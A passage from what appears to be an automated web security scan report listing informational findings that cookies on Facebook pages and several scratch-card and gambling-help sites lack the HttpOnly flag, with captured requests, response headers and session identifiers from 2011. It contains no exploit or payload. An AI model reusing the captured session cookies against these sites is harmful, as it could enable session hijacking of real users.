Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fpages%2FBigMoneyScratch%2F156518521055171; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fpages%2FBigMoneyScratch%2F156518521055171; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.38.33
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 0


12.229. http://www.facebook.com/pages/PrimeScratchCards/122783514413813

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/PrimeScratchCards/122783514413813

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/PrimeScratchCards/122783514413813 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.facebook.com/PrimeScratchCards
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTVS0-zB1xKJnbwFkgEiW; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=DEbk9; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.90.55
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 0


12.230. http://www.facebook.com/peoplespostcodelottery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /peoplespostcodelottery

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /peoplespostcodelottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTUnMC-QzxdCoW9pJpTTF; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=1P6PH; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.64
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 36902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

12.231. http://www.gambleaware.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gambleaware.co.uk
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.gambleaware.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: CONCRETE5=honf4qgul417u80l40kh20d0m4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta
...[SNIP]...

12.232. http://www.gamblersanonymous.org.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamblersanonymous.org.uk
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.gamblersanonymous.org.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 12:39:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Set-Cookie: 457660eccd85188d7d2891150ac044ff=3eaa237a8f33f5e9108f938ddea1ec7c; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 16 May 2011 12:39:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

12.233. http://www.hopa.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hopa.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.hopa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_4=EncryptedUniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=4; ASP.NET_SessionId=e01kb5453bgwt555nikmx12o;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: BO=FM; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: CSITemp=4; domain=hopa.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.234. http://www.hopa.com/visit.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hopa.com
Path:   /visit.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visit.aspx?csi=10&CorID=&SentDate=&CorExpTime=& HTTP/1.1
Host: www.hopa.com
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Set-Cookie: ASP.NET_SessionId=nfixaxv3hvxxgxi1a4r3yqyy; path=/; HttpOnly
Set-Cookie: CSI_4=EncryptedUniqueVisitorID=EEACA8F7E2BB877FE832932388F7EA58&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=hopa.com; expires=Fri, 16-May-2031 11:41:38 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: BO=FM; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: UniqueVisitorID=EEACA8F7E2BB877FE832932388F7EA58; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CSITemp=4; domain=hopa.com; path=/
Vary: Accept-Encoding
Content-Length: 131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



12.235. http://www.info.crazyscratch.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.236. http://www.info.crazyscratch.com/ContactUsFax.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsFax.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.237. http://www.info.crazyscratch.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.238. http://www.info.crazyscratch.com/ContactUsTel.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsTel.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54468


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.239. http://www.info.crazyscratch.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:55 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.240. http://www.info.crazyscratch.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:05 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55533


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.241. http://www.info.crazyscratch.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:44 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66913


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.242. http://www.info.crazyscratch.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:54 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.243. http://www.info.crazyscratch.com/Privacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Privacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Privacy.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
